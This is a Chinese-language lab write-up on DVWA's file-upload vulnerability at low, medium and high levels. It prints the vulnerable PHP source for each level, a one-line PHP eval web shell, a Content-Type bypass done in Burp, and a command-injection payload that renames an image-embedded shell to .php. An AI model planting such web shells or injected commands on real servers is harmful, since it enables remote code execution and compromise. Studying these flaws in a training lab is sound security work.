DVWA文件上传漏洞审计
●初级 🎈
首先尝试上传一个PHP文件,看是否会上传成功且被执行
<?php
phpinfo();
?>
浏览器访问一下:
成功执行,也就可以上传一句话木马了
<?php
@eval($_REQUEST[555]);
?>
使用蚁剑链接
代码审计一下:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
basename()函数:返回带有文件扩展名的文件名部分。例如:/xx/test.php,返回test.php
$target_path这个变量就是获取上传文件路径,move_uploaded_file函数移动文件上传位置,文件上传的时候会存到放临时目录,当脚本运行结束后就会销毁,所以要更改存放目录,可以看到,这个等级的上传完全没有限制,所以随便上传一个php木马就可以连接。
●中级 🎈🎈
首先尝试上传一个PHP文件,看是否会上传成功且被执行
<?php
phpinfo();
?>
发现不能直接上传php文件,只能上传JPEG和PNG文件,有文件限制。
使用BP抓包,可以通过修改Content-Type的值,依旧可以上传PHP文件
于是将就内容改为一句话木马
成功上传!!!
代码审计:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
分析源码,可以看到代码里对上传的类型和大小做了限制,只允许上传格式为jpeg和png格式,上传大小为小于100000字节。但是可以通过修改Content-Type的值,依旧可以上传PHP文件
●高级 🎈🎈🎈
使用中级的方法是不成功的。
查看源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
查看源码,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”.jpeg” 、”.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。发现仅仅后缀是图片格式的还不行,文件内容必须还得是图片格式的。
(采用命令注入的LOW+文件上传的high)
首先设置一个图片马,使用Notepad++打开.png文件,在其最后一行加入一句话木马
<?php @eval($_REQUEST[555]);?>
点击上传,成功上传。
使用rename将上传的shell.png图片马后缀改为.php
127.0.0.1|rename C:\phpStudy\WWW\DVWA-2.0.1\hackable\uploads\shell.png shell.php
在使用蚁剑进行连接: